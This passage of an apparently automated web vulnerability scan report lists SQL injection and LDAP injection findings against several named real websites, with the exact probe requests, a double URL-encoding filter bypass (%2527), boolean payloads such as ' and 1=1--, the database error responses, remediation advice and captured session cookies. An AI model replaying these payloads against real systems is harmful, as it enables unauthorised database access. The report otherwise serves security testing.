Set-Cookie: ASPSESSIONIDASTCAQQC=LDMLGBKDPDJFNIBBNADNPNMD; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772%27, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the campaignId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468%2527&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:42 GMT
Expires: Mon, 14 Feb 2011 01:41:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQQTQBCC=DLBNDMJDNKIDNMDKPADJABFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468%27, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the siteId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55%2527&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:06 GMT
Expires: Mon, 14 Feb 2011 01:41:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSACDSAD=PMPJANJDAHGLDPAGNOMFKNLG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55%27, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...

1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the syndicationOutletId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160%2527&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:27 GMT
Expires: Mon, 14 Feb 2011 01:41:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSACDSSTA=AHLNOCKDFBNKACKODKPLOBNG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160%27, @adro
...[SNIP]...

1.9. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.desmoinesregister.com
Path:   /scripts/app/js/jquery-1.3.1.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0508, on site D2 (2011-02-14 09:52:28:366)
Content-Type: text/html
X-Processing-finished: MOC-WN0508, on site D2 (2011-02-14 09:52:28:412)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27910
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 46 ms<br>
<b>Starting first parse</b><br>
.Build 9: 15 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 15ms<br>

-->

Request 2

GET /scripts/app'%20and%201%3d2--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0509, on site D2 (2011-02-14 09:52:28:514)
Content-Type: text/html
X-Processing-finished: MOC-WN0509, on site D2 (2011-02-14 09:52:28:608)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27923
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 78 ms Wait: 156 ms<br>
<b>Starting first parse</b><br>
.Build 9: 63 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 63ms<br>

-->

1.10. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.webbyawards.com
Path:   /webbys/current_honorees.php

Issue detail

The media_id parameter appears to be vulnerable to SQL injection attacks. The payloads 11757037%20or%201%3d1--%20 and 11757037%20or%201%3d2--%20 were each submitted in the media_id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d1--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:47:43 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=7b324e13987363266d824018404c2afd; expires=Mon, 21-Feb-2011 14:47:43 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d2--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:48:18 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=dafa34d404b3719f86b4df44da0b03b1; expires=Mon, 21-Feb-2011 14:48:18 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Webby Honorees</title>

<link href="/css/screen.css" rel="stylesheet" type="text/css" media="screen" />
<!--[if lte IE 7]>
<link href="/css/screen-ie.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->

<!--[if lte IE 6]>
<link href="/css/screen-ie6.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->



<link rel="shortcut icon" href="/images/favicon.ico" >



<script language="javascript" type="text/javascript" src="/script/rotate_quote.js"></script>
<script language="javascript" type="text/javascript" src="/script/site_globals.js"></script>
<script language="javascript" type="text/javascript" src="/script/swfobject.js"></script>


<style type="text/css">
        #bottom{ display: block; height: 300px; width: 400px; z-index: 10000; }
       </style>
       <script type="text/javascript" src="/takeover/js/swfobject.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
       
       <!--for homepage carousel -->
       <script type="text/javascript" src="/index-slider/js/jquery.jcarousel.js"></script>
<script type="text/javascript" src="/index-slider/js/jquery.cycle.all.js"></script>
       <link rel="stylesheet" type="text/css" href="/index-slider/css/skin.css" />
       
       

    <script type="text/javascript">
    var flashvars = {
       };
       var params = {
       };
       var attributes = {
        wmode: "transparent"
       };
    swfobject.embedSWF("/takeover/media/webbys.swf", "myContent", "400", "300", "9.0.0", flashvars, params, attributes);
    $(document).ready(function(){
    $("#close-flash").hide();
    $("#close-flash").de
...[SNIP]...

2. LDAP injection
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The q parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1e4b745d4d07d9a8)(sn=* and 1e4b745d4d07d9a8)!(sn=* were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=1e4b745d4d07d9a8)(sn=*&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 1

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=90
Expires: Mon, 14 Feb 2011 14:51:20 GMT
Date: Mon, 14 Feb 2011 14:49:50 GMT
Connection: close
Content-Length: 4237

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='1e4b745d4
...[SNIP]...
<iframe src="http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=27;s=3;d=9;w=300;h=250;l=http://xads.zedo.com/ads2/c%3Fa=805982%3Bn=305%3Bx=2333%3Bc=305002942,305002942%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=916%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250></iframe>');

var zzChId = -1;
var zzPbId = -1;
zzChId='2942';zzPbId='916';
var zzAdTagId = '805982_'+zzChId+'_'+zzPbId+'_300_250';
document.write("<span id='Zedo-Ad="+zzAdTagId+";Domain=.zedo.com'>");
document.write("</span>")
document.write('<script type="text/JavaScript">_qoptions={qacct:"p-02uqnnIGWyZdo"};<\/script><script type="text/JavaScript" src="http://secure.quantserve.com/quant.js"><\/script><noscript><img src=http://secure.quantserve.com/pixel/p-02uqnnIGWyZdo.gif style="display:none;" border="0" height="1" width="1" alt="Quantcast"/></noscript>');

Request 2

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=1e4b745d4d07d9a8)!(sn=*&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=90
Expires: Mon, 14 Feb 2011 14:51:21 GMT
Date: Mon, 14 Feb 2011 14:49:51 GMT
Connection: close
Content-Length: 5579

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='1e4b745d4
...[SNIP]...
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="300" height="250" id="300x250_7060dg_krons_debtw_vtg" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain" />');
document.write('<param name="allowFullScreen" value="false" />');
